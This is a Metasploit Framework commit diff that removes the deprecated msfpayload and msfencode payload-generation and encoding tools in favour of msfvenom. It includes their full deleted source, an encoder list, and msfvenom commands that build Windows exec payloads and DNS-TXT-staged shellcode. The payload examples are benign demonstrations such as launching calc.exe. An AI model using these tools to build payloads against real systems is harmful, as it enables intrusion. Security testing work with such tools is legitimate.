adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

Resolve #4326, remove msfpayload & msfencode. Use msfvenom instead!

Browse Source 
msfpayload and msfencode are no longer in metasploit. Please use
msfvenom instead.

Resolves #4326
This commit is contained in:
wchen-r7
2015-06-08 11:30:04 -05:00
parent a39539f8ef
commit 5a6a16c4ec
7 changed files with 10 additions and 668 deletions
Download Patch File Download Diff File Expand all files Collapse all files
external/source/DLLHijackAuditKit/regenerate_binaries.rb
Vendored
+5 -5
View File
@@ -2,12 +2,12 @@
dllbase = File.expand_path(File.dirname(__FILE__))
msfbase = File.expand_path(File.join(dllbase, "..", "..", ".."))
msfp = File.join(msfbase, "msfpayload")
msfv = File.join(msfbase, "msfvenom")
Dir.chdir(dllbase)
system("ruby #{msfp} windows/exec CMD=calc.exe X > runcalc.exe")
system("ruby #{msfp} windows/exec CMD=calc.exe D > runcalc.dll")
system("ruby #{msfp} windows/exec CMD='cmd.exe /c echo yes > exploited.txt' D > runtest.dll")
system("ruby #{msfp} windows/exec CMD='cmd.exe /c echo yes > exploited.txt' X > runtest.exe")
system("ruby #{msfv} -p windows/exec CMD=calc.exe -f exe -o runcalc.exe")
system("ruby #{msfv} -p windows/exec CMD=calc.exe -f dll -o runcalc.dll")
system("ruby #{msfv} -p windows/exec CMD='cmd.exe /c echo yes > exploited.txt' -f dll -o runtest.dll")
system("ruby #{msfv} -p windows/exec CMD='cmd.exe /c echo yes > exploited.txt' -f exe -o runtest.exe")
external/zsh/_msfencode
Vendored
-82
View File
@@ -1,82 +0,0 @@
#compdef msfencode
# ------------------------------------------------------------------------------
# License
# -------
# This file is part of the Metasploit Framework and is released under the MSF
# License, please see the COPYING file for more details.
#
# ------------------------------------------------------------------------------
# Description
# -----------
#
# Completion script for the Metasploit Framework's msfencode command
# (http://www.metasploit.com/).
#
# ------------------------------------------------------------------------------
# Authors
# -------
#
# * Spencer McIntyre
#
# ------------------------------------------------------------------------------
_msfencode_encoders_list=(
'cmd/generic_sh'
'cmd/ifs'
'cmd/powershell_base64'
'cmd/printf_php_mq'
'generic/eicar'
'generic/none'
'mipsbe/byte_xori'
'mipsbe/longxor'
'mipsle/byte_xori'
'mipsle/longxor'
'php/base64'
'ppc/longxor'
'ppc/longxor_tag'
'sparc/longxor_tag'
'x64/xor'
'x86/add_sub'
'x86/alpha_mixed'
'x86/alpha_upper'
'x86/avoid_underscore_tolower'
'x86/avoid_utf8_tolower'
'x86/bloxor'
'x86/call4_dword_xor'
'x86/context_cpuid'
'x86/context_stat'
'x86/context_time'
'x86/countdown'
'x86/fnstenv_mov'
'x86/jmp_call_additive'
'x86/nonalpha'
'x86/nonupper'
'x86/opt_sub'
'x86/shikata_ga_nai'
'x86/single_static_bit'
'x86/unicode_mixed'
'x86/unicode_upper'
)
_msfencode_encoder() {
_describe -t encoders 'available encoders' _msfencode_encoders_list || compadd "$@"
}
_arguments \
"-a[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
"-b[The list of characters to avoid, example: '\x00\xff']:bad characters" \
"-c[The number of times to encode the data]:times" \
"-d[Specify the directory in which to look for EXE templates]:template file:_files -/" \
"-e[The encoder to use]:encoder:_msfencode_encoder" \
"-h[Help banner]" \
"-i[Encode the contents of the supplied file path]:input file:_files" \
"-k[Keep template working; run payload in new thread (use with -x)]" \
"-l[List available encoders]" \
"-m[Specifies an additional module search path]:module path:_files -/" \
"-n[Dump encoder information]" \
"-o[The output file]:output file" \
"-p[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
"-s[The maximum size of the encoded data]:maximum size" \
"-t[The output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
"-v[Increase verbosity]" \
"-x[Specify an alternate executable template]:template file:_files"
lib/msf/util/exe.rb
+1 -1
View File
@@ -1811,7 +1811,7 @@ require 'msf/core/exe/segment_appender'
# Generate an executable of a given format suitable for running on the
# architecture/platform pair.
#
# This routine is shared between msfencode, rpc, and payload modules (use
# This routine is shared between msfvenom, rpc, and payload modules (use
# <payload>)
#
# @param framework [Framework]
metasploit-framework.gemspec
-1
View File
@@ -36,7 +36,6 @@ Gem::Specification.new do |spec|
'msfelfscan',
'msfencode',
'msfmachscan',
'msfpayload',
'msfpescan',
'msfrop',
'msfrpc',
modules/payloads/singles/windows/dns_txt_query_exec.rb
+4 -4
View File
@@ -40,10 +40,10 @@ module Metasploit3
# 1. Generate the shellcode you want to deliver via DNS TXT queries
# Make sure the shellcode is alpha_mixed or alpha_upper and uses EDI as bufferregister
# Example :
# ./msfpayload windows/messagebox TITLE="Friendly message from corelanc0d3r" TEXT="DNS Payloads FTW" R | ./msfencode -e x86/alpha_mixed Bufferregister=EDI -t raw
# Output : 654 bytes
# ./msfvenom -p windows/messagebox TITLE="Friendly message from corelanc0d3r" TEXT="DNS Payloads FTW" -e x86/alpha_mixed Bufferregister=EDI -f raw
# Output : 658 bytes
# 2. Split the alpha shellcode into individual parts of exactly 255 bytes (+ remaining bytes)
# In case of 654 bytes of payload, there will be 2 parts of 255 bytes, and one part of 144 bytes
# In case of 658 bytes of payload, there will be 2 parts of 255 bytes, and one part of 144 bytes
# 3. Create TXT records in a zone you control and put in a piece of the shellcode in each TXT record
# The last TXT record might have less than 255 bytes, that's fine
# The first part must be stored in the TXT record for prefix a.<yourdomain.com>
@@ -51,7 +51,7 @@ module Metasploit3
# etc
# First part must start with a. and all parts must be placed in consecutive records
# 4. use the dns_txt_query payload in the exploit, specify the name of the DNS zone that contains the DNS TXT records
# Example : /msfpayload windows/dns_txt_query_exec DNSZONE=corelan.eu C
# Example: ./msfvenom -p windows/dns_txt_query_exec DNSZONE=corelan.eu -f c
# (Example will show a messagebox)
#
# DNS TXT Records :
msfencode
-306
View File
@@ -1,306 +0,0 @@
#!/usr/bin/env ruby
# -*- coding: binary -*-
#
# $Id$
# $Revision$
#
$stderr.puts "[!] ************************************************************************"
$stderr.puts "[!] * The utility msfencode is deprecated! *"
$stderr.puts "[!] * It will be removed on or about 2015-06-08 *"
$stderr.puts "[!] * Please use msfvenom instead *"
$stderr.puts "[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *"
$stderr.puts "[!] ************************************************************************"
msfbase = __FILE__
while File.symlink?(msfbase)
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
require 'msfenv'
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
require 'rex'
require 'msf/ui'
require 'msf/base'
OutStatus = "[*] "
OutError = "[-] "
# Load supported formats
supported_formats = Msf::Simple::Buffer.transform_formats + Msf::Util::EXE.to_executable_fmt_formats
$args = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner" ],
"-l" => [ false, "List available encoders" ],
"-v" => [ false, "Increase verbosity" ],
# input/output
"-i" => [ true, "Encode the contents of the supplied file path" ],
"-m" => [ true, "Specifies an additional module search path" ],
"-o" => [ true, "The output file" ],
# architecture/platform
"-a" => [ true, "The architecture to encode as" ],
"-p" => [ true, "The platform to encode for" ],
# format options
"-t" => [ true, "The output format: #{supported_formats.join(',')}" ],
# encoder options
"-e" => [ true, "The encoder to use" ],
"-n" => [ false, "Dump encoder information" ],
"-b" => [ true, "The list of characters to avoid: '\\x00\\xff'" ],
"-s" => [ true, "The maximum size of the encoded data" ],
"-c" => [ true, "The number of times to encode the data" ],
# EXE generation options
"-d" => [ true, "Specify the directory in which to look for EXE templates" ],
"-x" => [ true, "Specify an alternate executable template" ],
"-k" => [ false, "Keep template working; run payload in new thread (use with -x)" ]
)
#
# Dump the list of encoders
#
def dump_encoders(arch = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => 4,
'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""),
'Columns' =>
[
"Name",
"Rank",
"Description"
])
cnt = 0
$framework.encoders.each_module(
'Arch' => arch ? arch.split(',') : nil) { |name, mod|
tbl << [ name, mod.rank_to_s, mod.new.name ]
cnt += 1
}
(cnt > 0) ? "\n" + tbl.to_s + "\n" : "\nNo compatible encoders found.\n\n"
end
#
# Returns the list of encoders to try
#
def get_encoders(arch, encoder)
encoders = []
if (encoder)
encoders << $framework.encoders.create(encoder)
else
$framework.encoders.each_module_ranked(
'Arch' => arch ? arch.split(',') : nil) { |name, mod|
encoders << mod.new
}
end
encoders
end
#
# Nuff said.
#
def usage
$stderr.puts("\n" + " Usage: #{$0} <options>\n" + $args.usage)
exit
end
def write_encoded(buf)
if (not $output)
$stdout.write(buf)
else
File.open($output, "wb") do |fd|
fd.write(buf)
end
end
end
# Defaults
verbose = 0
cmd = "encode"
arch = nil
badchars = ''
space = nil
encoder = nil
fmt = nil
input = $stdin
options = ''
delim = '_|_'
output = nil
ecount = 1
plat = nil
altexe = nil
inject = false
exedir = nil # use default
# Parse the argument and rock it
$args.parse(ARGV) { |opt, idx, val|
case opt
when "-i"
begin
input = File.open(val, 'rb')
rescue
$stderr.puts(OutError + "Failed to open file #{val}: #{$!}")
exit
end
when "-m"
$framework.modules.add_module_path(val)
when "-l"
cmd = "list"
when "-n"
cmd = "dump"
when "-a"
arch = val
when "-c"
ecount = val.to_i
when "-b"
badchars = Rex::Text.hex_to_raw(val)
when "-p"
plat = Msf::Module::PlatformList.transform(val)
when "-s"
space = val.to_i
when "-t"
if supported_formats.include?(val)
fmt = val
else
$stderr.puts(OutError + "Invalid format: #{val}")
exit
end
when "-o"
$output = val
when "-e"
encoder = val
when "-d"
exedir = val
when "-x"
altexe = val
when "-k"
inject = true
when "-h"
usage
when "-v"
verbose += 1
else
if (val =~ /=/)
options += ((options.length > 0) ? delim : "") + "#{val}"
end
end
}
if(not fmt and output)
pre,ext = output.split('.')
if(ext and not ext.empty?)
fmt = ext
end
end
if inject and not altexe
$stderr.puts "[*] Error: the injection option must use a custom EXE template via -x, otherwise the injected payload will immediately exit when the main process dies."
exit(1)
end
exeopts = {
:inject => inject,
:template => altexe,
:template_path => exedir
}
# Initialize the simplified framework instance.
$framework = Msf::Simple::Framework.create(
:module_types => [ Msf::MODULE_ENCODER, Msf::MODULE_NOP ],
'DisableDatabase' => true
)
# Get the list of encoders to try
encoders = get_encoders(arch, encoder)
# Process the actual command
case cmd
when "list"
$stderr.puts(dump_encoders(arch))
when "dump"
enc = encoder ? $framework.encoders.create(encoder) : nil
if (enc)
$stderr.puts(Msf::Serializer::ReadableText.dump_module(enc))
else
$stderr.puts(OutError + "Invalid encoder specified.")
end
when "encode"
input.binmode # ensure its in binary mode
buf = input.read
encoders.each { |enc|
next if not enc
begin
# Imports options
enc.datastore.import_options_from_s(options, delim)
skip = false
eout = buf.dup
raw = nil
1.upto(ecount) do |iteration|
# Encode it up
raw = enc.encode(eout, badchars, nil, plat)
# Is it too big?
if (space and space > 0 and raw.length > space)
$stderr.puts(OutError + "#{enc.refname} created buffer that is too big (#{raw.length})")
skip = true
break
end
# Print it out
$stderr.puts(OutStatus + "#{enc.refname} succeeded with size #{raw.length} (iteration=#{iteration})\n\n")
eout = raw
end
next if skip
output = Msf::Util::EXE.to_executable_fmt($framework, arch, plat, raw, fmt, exeopts)
if not output
fmt ||= "ruby"
output = Msf::Simple::Buffer.transform(raw, fmt)
end
if exeopts[:fellback]
$stderr.puts(OutError + "Warning: Falling back to default template: #{exeopts[:fellback]}")
end
write_encoded(output)
exit
#
# These exception codes are fatal, we shouldn't expect them to succeed on the next
# iteration, nor the next encoder.
#
rescue ::Errno::ENOENT, ::Errno::EINVAL
$stderr.puts(OutError + "#{enc.refname} failed: #{$!}")
break
rescue => e
$stderr.puts(OutError + "#{enc.refname} failed: #{e}")
if verbose > 0
e.backtrace.each { |el|
$stderr.puts(OutError + el.to_s)
}
end
end
}
$stderr.puts(OutError + "No encoders succeeded.")
end
msfpayload
-269
View File
@@ -1,269 +0,0 @@
#!/usr/bin/env ruby
# -*- coding: binary -*-
#
# $Id$
# $Revision$
#
$stderr.puts "[!] ************************************************************************"
$stderr.puts "[!] * The utility msfpayload is deprecated! *"
$stderr.puts "[!] * It will be removed on or about 2015-06-08 *"
$stderr.puts "[!] * Please use msfvenom instead *"
$stderr.puts "[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *"
$stderr.puts "[!] ************************************************************************"
msfbase = __FILE__
while File.symlink?(msfbase)
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
require 'msfenv'
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
require 'rex'
$args = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner" ],
"-l" => [ false, "List available payloads" ]
)
#
# Nuff said.
#
def usage
$stderr.puts("\n" +
" Usage: #{$0} [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|" +
"[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]|s[O]>\n" +
$args.usage)
exit
end
cmd = nil
rest = []
# Parse the argument and rock it
$args.parse(ARGV) { |opt, idx, val|
#puts "opt[%d]: #{opt.inspect} / #{val.inspect}" % idx
case opt
when "-l"
cmd = "list"
break
# Non-option (don't begin with '-') are processed here
when nil
rest << val
end
}
usage if cmd != "list" && rest.length < 2
require 'msf/ui'
require 'msf/base'
#
# Dump the list of payloads
#
def dump_payloads
tbl = Rex::Ui::Text::Table.new(
'Indent' => 4,
'Header' => "Framework Payloads (#{$framework.stats.num_payloads} total)",
'Columns' =>
[
"Name",
"Description"
])
$framework.payloads.each_module { |name, mod|
tbl << [ name, mod.new.description ]
}
"\n" + tbl.to_s + "\n"
end
# Initialize the simplified framework instance.
$framework = Msf::Simple::Framework.create(
:module_types => [ Msf::MODULE_PAYLOAD, Msf::MODULE_NOP ],
'DisableDatabase' => true
)
if cmd == "list"
puts dump_payloads
exit
end
# Get the payload name we'll be using
payload_name = rest.shift
# Process special var/val pairs...
Msf::Ui::Common.process_cli_arguments($framework, rest)
# Create the payload instance
payload = $framework.payloads.create(payload_name)
if (payload == nil)
$stderr.puts "Invalid payload: #{payload_name}"
exit
end
# Evalulate the command
cmd = rest.pop.downcase
# Populate the framework datastore
options = {}
rest.each do |x|
k,v = x.split("=", 2)
options[k.upcase] = v.to_s
end
# if LHOST is not set auto set it
if payload_name =~ /[\_\/]reverse/ and options['LHOST'].nil?
options['LHOST'] = Rex::Socket.source_address
end
payload.datastore.merge! options
if cmd =~ /^(p|y|r|d|c|h|j|x|b|v|w|n|o)$/
fmt = 'perl' if cmd =~ /^p$/
fmt = 'ruby' if cmd =~ /^y$/
fmt = 'raw' if cmd =~ /^(r|x|d|o)$/
fmt = 'raw' if cmd =~ /^v$/
fmt = 'c' if cmd =~ /^c$/
fmt = 'csharp' if cmd =~ /^h$/
fmt = 'js_be' if cmd =~ /^j$/ && Rex::Arch.endian(payload.arch) == ENDIAN_BIG
fmt = 'js_le' if cmd =~ /^j$/ && !fmt
fmt = 'java' if cmd =~ /^b$/
fmt = 'raw' if cmd =~ /^w$/
fmt = 'python' if cmd =~ /^n$/
enc = options['ENCODER']
begin
buf = payload.generate_simple(
'Format' => fmt,
'Options' => options)
rescue
$stderr.puts "Error generating payload: #{$!}"
exit
end
$stdout.binmode
if cmd =~ /^x$/
note =
"Created by msfpayload (http://www.metasploit.com).\n" +
"Payload: " + payload.refname + "\n" +
" Length: " + buf.length.to_s + "\n" +
"Options: " + options.inspect + "\n"
arch = payload.arch
plat = payload.platform.platforms
exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
if !exe && plat.index(Msf::Module::Platform::Java)
exe = payload.generate_jar.pack
end
if exe
$stderr.puts(note)
$stdout.write(exe)
exit(0)
end
$stderr.puts "No executable format support for this arch/platform"
exit(-1)
end
if cmd =~ /^v$/
exe = Msf::Util::EXE.to_win32pe($framework, buf)
note =
"'Created by msfpayload (http://www.metasploit.com).\r\n" +
"'Payload: " + payload.refname + "\r\n" +
"' Length: " + buf.length.to_s + "\r\n" +
"'Options: " + options.inspect + "\r\n"
vba = note + "\r\n" + Msf::Util::EXE.to_exe_vba(exe)
$stdout.write(vba)
exit(0)
end
if cmd =~ /^d$/
dll = Msf::Util::EXE.to_win32pe_dll($framework, buf)
note =
"Created by msfpayload (http://www.metasploit.com).\r\n" +
"Payload: " + payload.refname + "\r\n" +
" Length: " + buf.length.to_s + "\r\n" +
"Options: " + options.inspect + "\r\n"
if dll
$stderr.puts(note)
$stdout.write(dll)
exit(0)
end
$stderr.puts "Failed to build dll"
exit(-1)
end
if cmd =~ /^o$/
so = Msf::Util::EXE.to_linux_x64_elf_dll($framework, buf)
note =
"Created by msfpayload (http://www.metasploit.com).\r\n" +
"Payload: " + payload.refname + "\r\n" +
" Length: " + buf.length.to_s + "\r\n" +
"Options: " + options.inspect + "\r\n"
if so
$stderr.puts(note)
$stdout.write(so)
exit(0)
end
$stderr.puts "Failed to build dll"
exit(-1)
end
if cmd =~ /^w$/
note =
"Created by msfpayload (http://www.metasploit.com).\n" +
"Payload: " + payload.refname + "\n" +
" Length: " + buf.length.to_s + "\n" +
"Options: " + options.inspect + "\n"
arch = payload.arch
plat = payload.platform.platforms
exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
if (!exe && payload.respond_to?(:generate_war))
exe = payload.generate_war.pack
elsif exe
exe = Msf::Util::EXE.to_jsp_war(exe)
end
if exe
$stderr.puts(note)
$stdout.write(exe)
exit(0)
end
$stderr.puts "No executable format support for this arch/platform"
exit(-1)
end
$stdout.write(buf)
elsif cmd =~ /^(s|o)$/
payload.datastore.import_options_from_s(rest.join('_|_'), '_|_')
puts Msf::Serializer::ReadableText.dump_module(payload)
else
$stderr.puts "Invalid command: #{cmd.inspect}"
end